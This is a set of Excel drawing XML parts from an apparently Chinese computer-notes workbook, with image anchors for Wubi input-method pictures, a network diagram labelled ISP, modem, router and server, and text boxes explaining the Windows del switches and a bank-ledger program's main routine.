    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6920304</xdr:colOff>
      <xdr:row>111</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2063" name="Picture 15"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId13" cstate="print"/>
        <a:srcRect l="4375" t="13125" r="5703" b="7500"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="0" y="16657320"/>
          <a:ext cx="7209864" cy="397764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114300</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>9</xdr:col>
      <xdr:colOff>243840</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>182880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7414260" y="53340"/>
          <a:ext cx="129540" cy="12954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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>83820</xdr:colOff>
      <xdr:row>44</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4053840</xdr:colOff>
      <xdr:row>56</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2049" name="Picture 1" descr="http://www.23itw.com/upimg/allimg/100530/1614324a9-0.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="373380" y="10294620"/>
          <a:ext cx="3970020" cy="2095500"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>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8183880</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8313420</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>83820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473440" y="152400"/>
          <a:ext cx="129540" cy="12954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2956560</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>3086100</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>144780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6111240" y="15240"/>
          <a:ext cx="129540" cy="12954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2</xdr:col>
      <xdr:colOff>129540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2</xdr:col>
      <xdr:colOff>129540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4</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540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4312920" y="0"/>
          <a:ext cx="129540" cy="12954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4</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="图片 2"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7604760" y="0"/>
          <a:ext cx="129540" cy="12954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4</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="图片 2"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6614160" y="0"/>
          <a:ext cx="129540" cy="12954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4</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="图片 2"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336280" y="0"/>
          <a:ext cx="129540" cy="129540"/>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2</xdr:col>
      <xdr:colOff>129540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11</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540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7985760" y="0"/>
          <a:ext cx="129540" cy="129540"/>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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>23</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>144780</xdr:colOff>
      <xdr:row>23</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="8193" name="Picture 1" descr="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif">
          <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
        </xdr:cNvPr>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="289560" y="4914900"/>
          <a:ext cx="144780" cy="144780"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>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twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3672840</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7277100</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="TextBox 2"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3962400" y="2423160"/>
          <a:ext cx="3604260" cy="70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1100"/>
            <a:t>/F:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>强制删除只读文件；</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>/S:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>删除所有子目录中的指定</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" baseline="0"/>
            <a:t>的文件；</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t>/Q:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" baseline="0"/>
            <a:t>安静模式，删除全局通配符时，不要求确认；</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing54.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twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5113020</xdr:colOff>
      <xdr:row>29</xdr:row>
      <xdr:rowOff>182880</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8244840</xdr:colOff>
      <xdr:row>37</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="TextBox 2"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5402580" y="5875020"/>
          <a:ext cx="3131820" cy="1432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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>  对于主程序设计具有一定的通用性，</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>一是对系统 环境的设置；</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>二是对自定义菜单和工具栏的设计，以及启动边列出的画面或登录画面的设计。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>在左这段程序是我编制的建设银行计算机台帐的主称序，希望能对您有所帮助。</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing56.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2</xdr:col>
      <xdr:colOff>129540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3</xdr:col>
      <xdr:colOff>4861560</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>4991100</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>144780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6804660" y="213360"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>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3</xdr:col>
      <xdr:colOff>6332220</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>6461760</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>15240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7680960" y="83820"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>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13</xdr:col>
      <xdr:colOff>320040</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>13</xdr:col>
      <xdr:colOff>449580</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>22860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061960" y="91440"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>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3</xdr:col>
      <xdr:colOff>4084320</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>4213860</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>7620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892540" y="76200"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>754380</xdr:colOff>
      <xdr:row>46</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="7169" name="Picture 1" descr="mhtml:file://K:\wwuhn\computer%20knowledge\输入法\极点五笔入门指南freeime.mht!file:///C:\Program%20Files\freeime\freeime.gif"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="289560" y="3703320"/>
          <a:ext cx="3192780" cy="1988820"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>68580</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>112776</xdr:colOff>
      <xdr:row>30</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="图片 3" descr="五笔键盘图片副本.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4" cstate="print"/>
        <a:srcRect b="4679"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="68580" y="236220"/>
          <a:ext cx="9119616" cy="5433060"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>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2</xdr:col>
      <xdr:colOff>205740</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>281940</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1025" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/0d968f239f6eef57ac34de63.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="7071360" y="335280"/>
          <a:ext cx="1905000" cy="1562100"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8001000</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="图片 1" descr="01.gif">
          <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
        </xdr:cNvPr>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8290560" y="30480"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>320040</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>388620</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1026" name="Picture 2" descr="http://imgsrc.baidu.com/baike/abpic/item/4bd1e8039e86ad413912bbe7.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="7185660" y="2468880"/>
          <a:ext cx="1897380" cy="1623060"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>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3</xdr:col>
      <xdr:colOff>3977640</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>4107180</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>167640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52460" y="38100"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing75.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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2590800</xdr:colOff>
      <xdr:row>54</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4777740</xdr:colOff>
      <xdr:row>58</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1026" name="Picture 2"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect r="60899" b="19469"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="2880360" y="8884920"/>
          <a:ext cx="2186940" cy="693420"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5036820</xdr:colOff>
      <xdr:row>54</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6614160</xdr:colOff>
      <xdr:row>58</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1027" name="Picture 3"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4" cstate="print"/>
        <a:srcRect r="75986"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="5326380" y="8839200"/>
          <a:ext cx="1577340" cy="792480"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6873240</xdr:colOff>
      <xdr:row>54</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8336280</xdr:colOff>
      <xdr:row>58</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1028" name="Picture 4"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId5" cstate="print"/>
        <a:srcRect r="77726"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="7162800" y="8801100"/>
          <a:ext cx="1463040" cy="792480"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing78.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79.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81.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4297680</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4800600</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="TextBox 1"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4587240" y="1249680"/>
          <a:ext cx="502920" cy="396240"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx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ctr"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t> ISP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电信</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>或网通</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>45720</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>495300</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="4" name="TextBox 3"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8694420" y="1280160"/>
          <a:ext cx="449580" cy="304800"/>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lIns="0" rIns="0" rtlCol="0" anchor="t"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>Server</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5143500</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5783580</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="5" name="TextBox 4"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5433060" y="1280160"/>
          <a:ext cx="640080" cy="304800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="9525" cmpd="sng">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="40000"/>
              <a:lumOff val="6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1100"/>
            <a:t>Modem</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6141720</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6736080</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="7" name="TextBox 6"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6431280" y="1280160"/>
          <a:ext cx="594360" cy="304800"/>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1100"/>
            <a:t>Router</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>45720</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>45720</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="10" name="直接连接符 9"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="8374380" y="1600200"/>
          <a:ext cx="6400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8282940</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>228600</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="11" name="TextBox 10"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8572500" y="1882140"/>
          <a:ext cx="30480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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
